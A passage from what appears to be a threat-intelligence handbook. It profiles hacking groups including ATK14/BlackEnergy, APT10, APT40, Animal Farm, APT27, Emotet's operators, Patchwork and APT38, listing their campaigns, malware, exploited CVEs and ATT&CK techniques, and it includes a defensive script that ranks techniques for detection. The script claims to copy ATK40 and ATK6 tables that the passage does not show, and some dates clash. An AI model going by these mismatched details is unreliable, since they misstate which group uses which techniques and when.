ATK14 had shown interest in energy companies during previous campaigns. From the start of 2015, the group implanted itself in many electricity companies in order to install BlackEnergy and access their SCADA infrastructure. On 23 December, the attackers successfully hijacked the SCADA systems of their victims, turning substations off. The group also launched more classic DDoS attacks on the call centres of the electrical companies in order to make them unavailable to customers. This attack deprived many people of electricity for up to 6 hours. It is one of the first cases of cyber-sabotage of an electric grid and shows the attacker's determination and competence.

2016 - Continuing interest in energy, and renewal of the group's arsenal
In 2016, we observe a change in the group's arsenal.

December 2016 - Second attack against Ukraine's power grid
On 17 December 2016, a new malware strain, called Industroyer/Crashoverride, was discovered. This malware was specifically designed to target industrial control systems, and its use led to a massive power outage in Kiev that lasted around one hour.

June 2017 - NotPetya outbreak
MeDoc is an accounting program used in Ukraine by most domestic firms. It can update itself from a remote server. Prior to June 2017, this server was breached by the group, who could therefore push malicious files instead of updates. On 27 June, the group deployed a fake update, which was downloaded and launched by the MeDoc update process. This fake update contained a malware named NotPetya.

October 2017 - BadRabbit
In October 2017, the group used another strain of malware, named BadRabbit, in order to target victims in Ukraine. It hit major infrastructures, including the metro of Kiev, an airport and a naval port in Odessa, as well as Ukrainian ministries.

October 2018 - GreyEnergy
By October 2018, the group used a new malware: GreyEnergy.

2018 - 2019 - Continuation of campaigns, and links with other groups
Samples recovered by Kaspersky and FireEye suggest an overlap in some infrastructure of the BlackEnergy and Sofacy groups. In 2019, the group has continued its targeting of specific entities, with no specific development. Some campaigns started in 2018 might still be in progress, but no new campaign of large size has been detected.

Timeline
Oct-2008
Jan-2011 - 2011-2015 Operation Potao
Jan-2013 - 2013-2014 BlackEnergy Lite
Jan-2015 - 2015 Evolution of BlackEnergy - KillDisk
Dec-2015 - Power outage in Ukraine
Jan-2016 - 2016 Continuing interest in energy and renewal of the group arsenal
Dec-2016 - Second attack against Ukraine power grid
Jun-2017 - NotPetya outbreak
Oct-2017 - BadRabbit
Nov-2018 - GreyEnergy
2018-2019 - Continuation of campaigns and links with other groups
MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
T1195 - Supply Chain Compromise

Execution
T1047 - Windows Management Instrumentation
T1203 - Exploitation for Client Execution

Persistence
T1023 - Shortcut Modification
T1060 - Registry Run Keys / Startup Folder
T1067 - Bootkit

Credential Access
T1145 - Private Keys

Discovery
T1016 - System Network Configuration Discovery
T1049 - System Network Connections Discovery
T1082 - System Information Discovery
T1087 - Account Discovery

Lateral Movement
T1077 - Windows Admin Shares

Collection
T1113 - Screen Capture
T1119 - Automated Collection

Command and Control
T1024 - Custom Cryptographic Protocol
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol

Exfiltration
T1020 - Automated Exfiltration

Impact
T1486 - Data Encrypted for Impact
T1487 - Disk Structure Wipe
T1488 - Disk Content Wipe
T1495 - Firmware Corruption
T1498 - Network Denial of Service
T1499 - Endpoint Denial of Service
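The MODUS OPERANDI tables for ATK40, ATK6 and ATK14 above list techniques per tactic as "Txxxx - Name" lines. The script below is an added example, not part of the handbook or of any tooling by its authors: it parses listings in that format into per-actor technique sets and ranks techniques by how many of the profiled actors share them, which is the first step in deciding which detections give coverage against several groups at once. The three embedded listings are constructed excerpts copied from the tables above (Initial Access, Credential Access and Command and Control only); the function and variable names are assumptions of this example.

```python
"""Rank ATT&CK techniques across several actor profiles.

Added example, not part of the handbook. Input is the handbook's own
MODUS OPERANDI layout: a tactic header line followed by one
"Txxxx - Name" line per technique. The listings below are constructed
excerpts copied from the ATK40, ATK6 and ATK14 tables.
"""
import re
from collections import Counter

# One technique per line: id, separator, human-readable name.
TECHNIQUE_LINE = re.compile(r"^(T\d{4})\s*-\s*(.+?)\s*$")

ATK40_LISTING = """\
Initial Access
T1078 - Valid Accounts
T1133 - External Remote Services
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
Credential Access
T1003 - Credential Dumping
T1110 - Brute Force
Command and Control
T1071 - Standard Application Layer Protocol
T1105 - Remote File Copy
"""

ATK6_LISTING = """\
Initial Access
T1078 - Valid Accounts
T1189 - Drive-by Compromise
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
Credential Access
T1003 - Credential Dumping
T1110 - Brute Force
T1187 - Forced Authentication
Command and Control
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
"""

ATK14_LISTING = """\
Initial Access
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
T1195 - Supply Chain Compromise
Command and Control
T1024 - Custom Cryptographic Protocol
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
"""


def parse_listing(text):
    """Return {technique_id: {"name": str, "tactics": set}} for one actor.

    A line without a technique id is a tactic header that applies to the
    technique lines after it; one id may recur under several tactics.
    """
    techniques, tactic = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = TECHNIQUE_LINE.match(line)
        if match is None:
            tactic = line
            continue
        tid, name = match.group(1), match.group(2)
        entry = techniques.setdefault(tid, {"name": name, "tactics": set()})
        if tactic is not None:
            entry["tactics"].add(tactic)
    return techniques


ACTORS = {
    "ATK40": parse_listing(ATK40_LISTING),
    "ATK6": parse_listing(ATK6_LISTING),
    "ATK14": parse_listing(ATK14_LISTING),
}


def technique_prevalence(actors=ACTORS):
    """Number of profiled actors listed with each technique id."""
    counts = Counter()
    for techniques in actors.values():
        counts.update(techniques.keys())
    return counts


def shared_techniques(actor_a, actor_b, actors=ACTORS):
    """Sorted technique ids that both actors are listed with."""
    return sorted(set(actors[actor_a]) & set(actors[actor_b]))


def detection_priorities(top=5, actors=ACTORS):
    """Top N (id, actor count) pairs, most widely used technique first.

    A detection for a technique near the top of this list pays off
    against several of the profiled groups at once; ties break by id.
    """
    ranked = sorted(technique_prevalence(actors).items(),
                    key=lambda item: (-item[1], item[0]))
    return ranked[:top]


if __name__ == "__main__":
    for tid, count in detection_priorities():
        print(f"{tid}: listed for {count} of {len(ACTORS)} actors")
    print("Shared by ATK40 and ATK14:", shared_techniques("ATK40", "ATK14"))
```

Run the file directly to print the ranking for the three embedded listings; to apply it to the other profiles, paste their MODUS OPERANDI lines into further listings and add them to ACTORS. Because the parser keeps the tactic headers, the same data can also answer which tactic a technique appears under for a given actor.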
Alias: APT 10, ATK41, CVNX, CLOUD HOPPER, DUSTSTORM, HAPPYYONGZI, HOGFISH, MENUPASS, POTASSIUM, RED APOLLO, STONE PANDA
Score: 73
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: Defence, Energy, Financial Services, Government Agencies, High-Tech, Media
Motivations & Objectives: Espionage
Language: Unknown

DESCRIPTION
ATK41 (APT10, Stone Panda, CVNX, MenuPass Group, Potassium, Red Apollo, Hogfish, Cloud Hopper, DustStorm, Happyyongzi) is a threat group that appears to originate from China and has been active since approximately 2009.

CAMPAIGNS

Dust Storm
A long-standing persistent threat targeting numerous major industries spread across Japan, South Korea, the United States, Europe and several other Southeast Asian countries has been discovered. This operation is baptized Dust Storm.

MenuPass operation: APT10 expands its operations
In June 2016, FireEye reported that APT10 had expanded its operations, first targeting a Japanese university before extending its activities to the six continents until 2017. In 2017, APT10 compromised manufacturing companies in India, Japan and Northern Europe, but also mining companies in South America and finally multiple IT service providers across the world. FireEye believes these companies and industries are not all final targets but sometimes only organizations that could provide a foothold.

Cloud Hopper: a targeted APT10 campaign
Between November 2017 and September 2018, APT10 launched new campaigns and targeted at least three American and European companies. Among these companies are an IT and business cloud services managed service provider (MSP) and Visma, a billion-dollar Norwegian company with at least 850,000 customers globally, an international apparel company, and a U.S. law firm specialized in intellectual property law with customers in the pharmaceutical, technology, electronics, biomedical and automotive sectors, among others.

APT10: Campaign against Japan, North-Korea and South American personalities
A new APT10 campaign was detected and blocked in 2018. The latter was aimed at the Japanese media sector.

APT10 targets government agencies in the Philippines and Southeast Asia
At the end of April, a new activity of the APT10 group was detected. The sample analysed comes from the Philippines; it is likely that other Southeast Asian countries were targeted.

Timeline
Jan-2010 - Dust Storm
Jan-2016 - MenuPass Operation: APT10 expands its operations
Nov-2017 - Cloud Hopper: a targeted APT10 campaign
Jan-2018 - APT10: campaign against Japan, North-Korea and South-America personalities
Apr-2019 - APT10 targets government agencies in the Philippines and Southeast Asia

TOOLS, MALWARES AND VULNERABILITIES

Malwares
 ChChes
 EvilGrab
 Misdat
 Mis-Type
 PoisonIvy
 RedLeaves
 SNUGRIDE
 S-Type
 UPPERCUT
 ZLib

Legitimate software
 Certutil
 Cmd
 Quasarrat
 Impacket
 Mimikatz
 Net
 Ping
 Psexec
 Powersploit
 Pwdump

Exploited vulnerabilities
 None

Targeted Countries: Eastern Asia, Eastern Europe, Middle East, South-eastern Asia, South America, Western Europe
Assumed origin of the attacker: China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1193 - Spearphishing Attachment
T1199 - Trusted Relationship

Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1204 - User Execution

Persistence
T1038 - DLL Search Order Hijacking
T1053 - Scheduled Task
T1078 - Valid Accounts

Privilege Escalation
T1038 - DLL Search Order Hijacking
T1053 - Scheduled Task
T1078 - Valid Accounts

Defense Evasion
T1027 - Obfuscated Files or Information
T1036 - Masquerading
T1038 - DLL Search Order Hijacking
T1064 - Scripting
T1073 - DLL Side-Loading
T1078 - Valid Accounts
T1093 - Process Hollowing
T1107 - File Deletion
T1140 - Deobfuscate/Decode Files or Information

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture

Discovery
T1016 - System Network Configuration Discovery
T1018 - Remote System Discovery
T1046 - Network Service Scanning
T1049 - System Network Connections Discovery
T1087 - Account Discovery

Lateral Movement
T1021 - Remote Services
T1076 - Remote Desktop Protocol
T1105 - Remote File Copy

Collection
T1005 - Data from Local System
T1039 - Data from Network Shared Drive
T1056 - Input Capture
T1074 - Data Staged

Command and Control
T1090 - Connection Proxy
T1105 - Remote File Copy

Exfiltration
T1002 - Data Compressed
T1022 - Data Encrypted
Alias: APT40, ATK29, LEVIATHAN, TEMP.PERISCOPE, TEMP.JUMPER
Score: 71
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: Government Agencies, International Organizations, Naval
Motivations & Objectives: Espionage
Language: Unknown

DESCRIPTION
The TEMP.Periscope or Leviathan group, gathered with the TEMP.Jumper group within ATK29, is a state-owned group of Chinese origin. It is known for its attacks on foreign maritime systems to extract data necessary for the development of Chinese navy skills, as well as for its geostrategic use in the context of the "New Silk Roads" project. This group also campaigned against the Cambodian government in the general elections of 29 June 2018. The infrastructure used in this attack shares many similarities with that used in campaigns against the maritime domain. These similarities allow us to reinforce the conclusions that link the group to these two different campaigns and that establish the Chinese origin of the latter. FireEye links the two groups TEMP.Periscope and TEMP.Jumper definitively in a report published in March 2019.
Since March 2019, there has been a paradigm shift and a change in the target group. Thus, while the group had mainly targeted maritime companies in order to help the Chinese Navy catch up, it is increasingly targeting political organizations in Southeast Asia. The purpose of these espionage actions is to support the Chinese Silk Roads project on freight transport infrastructure projects. ATK29 is a group whose campaigns obey the Chinese needs for technological catch-up and Beijing's diplomatic ambitions. The group is always very active and is composed of competent people. Its arsenal is composed of many tools, which are regularly changed. It is quite reactive and has, in the past, used security vulnerabilities only a few days after their publication. Many of the tools used by this group are also used by other Chinese state attackers, suggesting exchanges of skills and tools between different sections. In addition, the group shared its infrastructure with another group of Chinese attackers, Hellsing.

CAMPAIGNS

NanHaiShu Campaign
In December 2014, the Hague Tribunal, seized of a dispute between China and the Philippines over the South China Sea, rendered its verdict. During these events, the NanHaiShu malware was used by China to obtain strategic information about the dispute. Thus, among its targets are the Philippine Department of Justice, APEC, as well as the firm responsible for representing the Philippines.

Leviathan Campaign
In October 2017, the company Proofpoint published a report on an attacker named Leviathan. This attacker, who is said to have been active since at least 2014, targets maritime industries, naval contractors working in defence as well as research institutions in this field. Geographically, its attacks focus on the United States and Western Europe, as well as the South China Sea.

Temp.Periscope Targets Cambodia
The group's activities increased in the summer of 2017, and it came back to the forefront with new tools. It systematically targets naval opponents, particularly in the United States. Another report published in July 2018 shows a return to the first targets of Attacker 29, the political organizations of countries in the South China Sea. Thus, the group is illustrated by the targeting of Cambodian elections, as well as by the compromise of government entities responsible for these elections. Some of the themes addressed in some versions of one of the group's malware, AIRBREAK, suggest a more extensive targeting of several political organizations located in Southeast Asia (a significant targeting of Cambodia, most of them from Cambodian newspapers, such as the Khmer Times, the Phnom Penh Post or the Cambodia Daily).

Timeline
Jan-2014 - Leviathan Campaign
Mar-2015 - NanHaiShu Campaign
Jul-2018 - Temp.Periscope Targets Cambodia

TOOLS, MALWARES AND VULNERABILITIES

Malwares
 AIRBREAK
 BLACKCOFFEE
 China Chopper
 Dadbod
 Derusbi
 Eviltech
 gh0st RAT
 Grillmark
 HOMEFRY
 MURKYTOP
 NanHaiShu
 Orz

Legitimate software
 Cobalt Strike
 LunchMoney

Exploited vulnerabilities
 CVE-2017-8759
 CVE-2017-11882
 CVE-2017-0199

Targeted Countries: Cambodia, Philippines, Southeast Asia, United States, Western Europe
Assumed origin of the attacker: China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1047 - Windows Management Instrumentation
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1117 - Regsvr32
T1168 - Local Job Scheduling
T1203 - Exploitation for Client Execution
T1204 - User Execution

Persistence
T1023 - Shortcut Modification
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts
T1098 - Account Manipulation
T1100 - Web Shell
T1168 - Local Job Scheduling
T1197 - BITS Jobs

Privilege Escalation
T1078 - Valid Accounts
T1100 - Web Shell

Defense Evasion
T1009 - Binary Padding
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1078 - Valid Accounts
T1102 - Web Service
T1112 - Modify Registry
T1116 - Code Signing
T1117 - Regsvr32
T1140 - Deobfuscate/Decode Files or Information
T1197 - BITS Jobs

Credential Access
T1003 - Credential Dumping
T1098 - Account Manipulation

Discovery
T1010 - Application Window Discovery
T1057 - Process Discovery
T1083 - File and Directory Discovery
T1087 - Account Discovery

Lateral Movement
T1105 - Remote File Copy

Collection
T1074 - Data Staged
T1119 - Automated Collection

Command and Control
T1043 - Commonly Used Port
T1094 - Custom Command and Control Protocol
T1102 - Web Service
T1105 - Remote File Copy
T1132 - Data Encoding

Exfiltration
T1022 - Data Encrypted
T1048 - Exfiltration Over Alternative Protocol
Alias: ANIMAL FARM, ATK8, SNOWGLOBE
Score: 71
Threat Actor: Cyber Criminal /Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: International Organizations, Military, Media
Motivations & Objectives: Espionage
Language: Unknown

DESCRIPTION
ATK8 (or Animal Farm) is a group of French origin known for its high-quality malware. The group has been active since at least 2009, and some of its malware has been associated with samples from as far back as 2007. The group was discovered in March 2014 after the publication of a series of slides from Edward Snowden. This group is probably supported by a nation-state, considering the fact that it uses advanced techniques but does not seem to be financially motivated. Another more precise indication makes it possible to link the group to France. For good reason, the name "Babar" given to the group's spyware echoes a strictly French fictional character. Also, the backdoor called "Tafacalou" has a name whose meaning in the Occitan French regional language translates as "it's gonna get hot".
While the group is not associated with any campaign in particular, the tools it uses have been employed to target various organizations, notably in Syria, Iran and Malaysia. More broadly, the group deploys its campaigns on a global scale, with some twenty countries concerned. The group mostly develops and uses espionage tools, and the way the malware is deployed to its targets is mostly unknown, though some documents containing zero-day exploits have been used.

CAMPAIGNS
Insufficient information

TOOLS, MALWARES AND VULNERABILITIES

Malwares
 Babar
 EvilBunny
 Casper
 Dino
 Tafacalou

Legitimate software
 None

Exploited vulnerabilities
 CVE-2014-0515
 CVE-2011-4369

Targeted Countries: Algeria, Austria, China, Democratic Republic of the Congo, Europe, Germany, Great Britain, Israel, Iran, Iraq, Malaysia, Morocco, Netherlands, New Zealand, Russia, Syria, Sweden, Turkey, Ukraine, United States
Assumed origin of the attacker: France

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1189 - Drive-by Compromise

Execution
T1053 - Scheduled Task
T1064 - Scripting
T1203 - Exploitation for Client Execution

Persistence
T1050 - New Service
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1179 - Hooking

Privilege Escalation
T1050 - New Service
T1053 - Scheduled Task
T1055 - Process Injection
T1179 - Hooking

Defense Evasion
T1027 - Obfuscated Files or Information
T1036 - Masquerading
T1055 - Process Injection
T1064 - Scripting
T1093 - Process Hollowing
T1112 - Modify Registry
T1497 - Virtualization/Sandbox Evasion

Credential Access
T1056 - Input Capture
T1179 - Hooking

Discovery
T1010 - Application Window Discovery
T1012 - Query Registry
T1057 - Process Discovery
T1063 - Security Software Discovery
T1082 - System Information Discovery
T1497 - Virtualization/Sandbox Evasion

Collection
T1056 - Input Capture
T1074 - Data Staged
T1115 - Clipboard Data
T1119 - Automated Collection
T1123 - Audio Capture
T1125 - Video Capture

Command and Control
T1001 - Data Obfuscation
T1008 - Fallback Channels
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol

Exfiltration
T1002 - Data Compressed
T1020 - Automated Exfiltration
T1022 - Data Encrypted
T1041 - Exfiltration Over Command and Control Channel

Alias _
APT 27, ATK15, BRONZE UNION, EMISSARY PANDA, GROUP 35, HIPPOTEAM, IRON TIGER, LUCKYMOUSE, TEMP.HIPPO, TG-3390, THREAT GROUP-3390, ZIPTOKEN
Score: 71

Targeted Sectors _
Aerospace, Communication, Naval, Defence, Government Agencies, Manufacturing, Political Organizations, Education

Motivations & Objectives _
Espionage

Language: Unknown

DESCRIPTION
ATK15 is a cyber espionage group active since at least 2009 (first spearphishing spotted by TrendMicro on November 25, 2009), likely based in the People's Republic of China. The group has a preference for leveraging strategic web compromise (SWC) and scan-and-exploit techniques to compromise target systems.

CAMPAIGNS
APT27 Spear Phishing
25 November 2009 - 25 January 2011: spear-phishing campaign on multiple sectors (media, political organizations, education, government, manufacturing, technology, non-profit organizations and others).

APT27 Spear Phishing with corrupted documents related to Taiwan
23 April 2013: Spear-phishing campaign on government entities with decoy documents related to Taiwan.

New spear phishing campaign from APT27
9 May 2014: Spear-phishing campaign on government entities.

Spear-phishing on telecommunication and technology companies
5 September - 12 October 2014: Spear-phishing on telecommunication and technology companies.

Iron Tiger operation
APT27 first attacked targets in the education industry in China, political dissidents in Hong Kong, government agencies in the Philippines and political targets in Tibet until 2010. They used “Han Zheng stays at the Regent Pan-Housing demonstration organized in advance” as a decoy to attract politicians who would join a demonstration against the former mayor of Shanghai. Other topics outlined the attackers' objective to target very important people (VIPs), engineers, and/or public relations (PR) or communication officers. In 2013, Iron Tiger's objectives changed. After carrying out cyber-espionage exploits, the attackers focused on defence and technology-related areas such as aerospace, energy, intelligence, nuclear engineering and telecommunications. The attackers seem to be constantly monitoring the US government's high-tech contractors.

APT27 conducted a strategic web compromise (SWC)
2016: ATK15 conducted a strategic web compromise (SWC) on the website of an international industry organization that affected aerospace, academic, media, technology, government, and utilities organizations around the world. During a discrete period of activity, this SWC was used to specifically target Turkish government, banking, and academic networks.

Operation PZChao
2017: In Operation PZChao, ATK15 infected targets with Bitcoin miners, a password stealer and variants of Gh0st RAT.

APT27 targets a national data center in Central Asia
Autumn 2017 - March 2018: campaign targeting a national data centre in Central Asia.

Timeline (figure): Nov-2008 APT27 spear phishing; Aug-2010 Iron Tiger operation; Apr-2013 APT27 spear phishing with corrupted documents related to Taiwan; May-2014 New spear phishing campaign from APT27; Sep-2014 Spear phishing on telecommunication and technology companies; Jan-2016 APT27 conducted a strategic web compromise (SWC); Jan-2017 Operation PZChao; Oct-2017 APT27 targets a national data center in Central Asia.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: Aspxspy, Httpbrowser, Owaauth
Legitimate software: Gsecdump, Windows Credential Editor
Exploited vulnerabilities: None



Targeted Countries _
Spain, United States, United Kingdom, Turkey, Central Asia, China, Hong Kong, Philippines, Tibet

Assumed origin of the attacker: China

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1133 - External Remote Services

Execution
T1028 - Windows Remote Management
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1086 - PowerShell

Persistence
T1053 - Scheduled Task
T1078 - Valid Accounts
T1108 - Redundant Access
T1133 - External Remote Services

Privilege Escalation
T1053 - Scheduled Task
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts

Defense Evasion
T1073 - DLL Side-Loading
T1078 - Valid Accounts
T1089 - Disabling Security Tools
T1107 - File Deletion
T1108 - Redundant Access
T1126 - Network Share Connection Removal

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture

Discovery
T1016 - System Network Configuration Discovery
T1046 - Network Service Scanning
T1049 - System Network Connections Discovery
T1087 - Account Discovery

Lateral Movement
T1028 - Windows Remote Management
T1105 - Remote File Copy

Collection
T1005 - Data from Local System
T1056 - Input Capture
T1074 - Data Staged
T1119 - Automated Collection

Command and Control
T1043 - Commonly Used Port
T1105 - Remote File Copy

Exfiltration
T1002 - Data Compressed
T1022 - Data Encrypted
T1030 - Data Transfer Size Limits

Alias _
ATK104, Mummy Spider, TA542
Score: 70

Targeted Sectors _
Bank

Motivations & Objectives _
Financial Gain

Language: Unknown

DESCRIPTION
ATK104 is a cybercriminal group responsible for the malware known as Emotet (also known as Geodo). This malware is the only one maintained by the group. While Emotet was originally sold on illegal markets, it became integrally private in 2015, and is therefore operated solely by the group. The group is composed of competent personnel, and Emotet is regularly considered as one of the most threatening malware for businesses.

CAMPAIGNS
Emotet long-running campaigns
Emotet, first seen around May 2014, was originally designed as a modular banking trojan. It shared code with another banking trojan, Feodo. The group did however add features and improve already existing code.
In its first campaigns, Emotet was bundled with a banking module targeting Germany and Austria.
The second version of Emotet, discovered in fall 2014, made use of the Automatic Transfer System, had a spamming module and a DDoS module, and was able to steal data from address books.
A third version, which appeared in January 2015, was stealthier and included a banking module for Switzerland.
The group is known for being extremely active for a few months before stopping the spread of the malware for long periods. Indeed, after a 10-month break, the group came back in December 2016.
In this fourth iteration of Emotet, the group made use of the RIG exploit kit to ensure its spread. The group used third-party tools integrated into modules for this campaign, which allowed the group to distribute third-party malware, especially the Dridex and Quakbot banking trojans.
Emotet features an email collection and templating engine, which allows it to send emails on behalf of its victims in order to spread further.
Since 2016, the tool mainly acts as a loader that deploys other malware. In 2018, for example, the group mainly deployed TrickBot to its victims, which in turn has been seen distributing ransomware such as Ryuk.
Emotet uses a C&C infrastructure composed of Tier 1 C&C and Tier 2 C&C servers, the first acting as proxies to the second. This makes its architecture reliable and hard to take down. In June 2019, Emotet C&C servers became unavailable, another period of inactivity from ATK104, possibly for an infrastructure upgrade. The servers came back online on August 22, 2019, using the same binaries as before.

Timeline (figure): May-2014 Emotet long-running campaigns.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: Emotet
Legitimate software: None
Exploited vulnerabilities: None



Targeted Countries _
Austria, Germany, Switzerland

Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1203 - Exploitation for Client Execution
T1204 - User Execution

Persistence
T1023 - Shortcut Modification
T1050 - New Service
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts

Privilege Escalation
T1050 - New Service
T1053 - Scheduled Task
T1055 - Process Injection
T1078 - Valid Accounts

Defense Evasion
T1027 - Obfuscated Files or Information
T1045 - Software Packing
T1055 - Process Injection
T1064 - Scripting
T1078 - Valid Accounts

Credential Access
T1003 - Credential Dumping
T1040 - Network Sniffing
T1081 - Credentials in Files
T1110 - Brute Force

Discovery
T1040 - Network Sniffing
T1057 - Process Discovery

Lateral Movement
T1077 - Windows Admin Shares
T1210 - Exploitation of Remote Services

Collection
T1114 - Email Collection

Command and Control
T1032 - Standard Cryptographic Protocol
T1043 - Commonly Used Port
T1065 - Uncommonly Used Port
T1094 - Custom Command and Control Protocol

Exfiltration
T1022 - Data Encrypted
T1041 - Exfiltration Over Command and Control Channel

Impact
T1498 - Network Denial of Service

Alias _
APT-C-35, ATK11, CHINASTRATS, DROPPING ELEPHANT, MONSOON, PATCHWORK, QUILTED TIGER, SARIT, SECTORE02
Score: 69

Targeted Sectors _
Aviation, Embassies, Energy, Financial Services, Government Agencies, Military, Non-governmental organizations, Political Organizations, Public sector, Software

Motivations & Objectives _
Espionage, Theft of sensitive documents

Language: English

DESCRIPTION
Patchwork is a cyber espionage group active since at least 2010. One of its specificities is the use of code copy-pasted from multiple online forums combined with high quality social engineering. It started with Operation Hangover, whose goal seemed to be the surveillance of targets of national security interest for India such as Pakistan or the Nagaland movement. This group was involved in the MONSOON campaign targeting multiple Indian neighbours in various sectors. Multiple articles showed similarities between Patchwork's behaviours and those of other groups (Confucius, Bahamut, Donot Team or BITTER APT), but there is no definitive conclusion as to whether these groups are the same or not.

CAMPAIGNS
2010 - Operation Hangover
Operation Hangover started in 2010 and is the first operation which can be attributed to the Patchwork APT. This campaign targeted Indian national security interests but also Telenor, a Norwegian telecom company.

March - May 2015 - Targeted Campaign Against Pakistan Government

December 2015 - July 2016 - Patchwork/MONSOON campaign
Patchwork/MONSOON is a targeted attack that has infected an estimated 2,500 machines since it was first observed in December 2015. This campaign targeted different Chinese industries and government agencies in Southeast Asia.

2016 - 2017 - Spear-phishing campaign spreading BADNEWS
During these two years the Patchwork group sent multiple spear-phishing lure documents related to the Pakistan Army, the Pakistan Atomic Energy Commission, as well as the Ministry of the Interior to spread their BADNEWS backdoor.

March - April 2018 - Spear-phishing campaign against US think tanks
Volexity observed a spear-phishing campaign against US think tanks using China-related emails containing a link to download a variant of QuasarRAT.

Timeline (figure): Jan-2010 Operation Hangover; Mar-2015 March-May 2015 Targeted campaign against Pakistan Government; Dec-2015 Dec 2015 - Jul 2016 Patchwork/MONSOON campaign; Jan-2016; 2016-2017 Spearphishing campaign spreading BADNEWS; Mar-2018 Spearphishing campaign against US think tanks.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: BADNEWS, Enfourks, NDiskMonitor, QuasarRAT, Taskhost Stealer, TINYTYPHON, Unknown Logger Public, Wintel Stealer
Legitimate software: None
Exploited vulnerabilities: CVE-2012-0158, CVE-2012-0422, CVE-2017-0199, CVE-2017-0261, CVE-2012-4792, CVE-2017-11882, CVE-2014-4114, CVE-2014-6332, CVE-2015-1641, CVE-2017-8570, CVE-2017-12824, CVE-2009-0927, CVE-2014-6352



Targeted Countries _
Bangladesh, Ceylon, China, Europe, Israel, Japan, Southeast Asia, South China Sea, South Korea, Sri Lanka, United Kingdom, United States

Assumed origin of the attacker: India

MODUS OPERANDI (ATT&CK FRAMEWORK)

Execution
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1204 - User Execution

Persistence
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1158 - Hidden Files and Directories

Privilege Escalation
T1053 - Scheduled Task
T1088 - Bypass User Account Control

Defense Evasion
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1066 - Indicator Removal from Tools
T1073 - DLL Side-Loading
T1088 - Bypass User Account Control
T1107 - File Deletion
T1112 - Modify Registry
T1140 - Deobfuscate/Decode Files or Information
T1158 - Hidden Files and Directories
T1497 - Virtualization/Sandbox Evasion

Credential Access
T1056 - Input Capture

Discovery
T1010 - Application Window Discovery
T1082 - System Information Discovery
T1083 - File and Directory Discovery
T1497 - Virtualization/Sandbox Evasion

Collection
T1005 - Data from Local System
T1025 - Data from Removable Media
T1039 - Data from Network Shared Drive
T1056 - Input Capture
T1074 - Data Staged
T1113 - Screen Capture
T1114 - Email Collection
T1119 - Automated Collection

Command and Control
T1024 - Custom Cryptographic Protocol
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
T1132 - Data Encoding

Exfiltration
T1020 - Automated Exfiltration
T1041 - Exfiltration Over Command and Control Channel

Alias _
APT 38, ATK117, BLUENOROFF, STARDUST CHOLLIMA
Score: 69

Targeted Sectors _
Financial Services, Media

Motivations & Objectives _
Financial Gain

Language: Unknown

DESCRIPTION
Unit 180 is the North Korean unit in charge of obtaining funds for the cyber activity and for the North Korean regime. This activity has existed since at least 2014 and seems to have been increasing since North Korea has been subject to severe financial sanctions due to the development of new weapons. The economic pressure on Pyongyang leads the North Korean government to find new ways to obtain funding.

APT38 is a North Korean financially motivated threat group which developed multiple ways to steal money, from targeted attacks on banks and cryptocurrency exchanges to the spreading of ransomware. This group seems to have been learning about financial transactions in 2014 and developed a SWIFT malware in 2015. From 2014 to 2017 they mostly targeted organizations from Southeast Asia and expanded to South America and Africa in mid-2016. They also targeted Europe and North America from October 2016 to October 2017.

APT38 has a complete arsenal of malware and tools using defense evasion techniques and false flags (use of some poorly translated Russian language in some malware, re-use of known malware). It is possible that this malware was developed by another unit (such as Unit 31), and these techniques could be used by other North Korean groups. Despite this arsenal, APT38 uses living-off-the-land tools when possible. They put an effort into discovering the targeted environment and maintaining access as long as possible while staying undetected until they reach their goal. FireEye estimates that they stay in a victim network approximately 155 days.

Since 2018 the group has gone from stealthy to noisy, using the destructive KillDisk malware as a distraction tactic while they are targeting the SWIFT network to initiate malicious transactions.

We suspect Unit 180 to be the source of the WannaCry ransomware in 2017.

Strategic Context
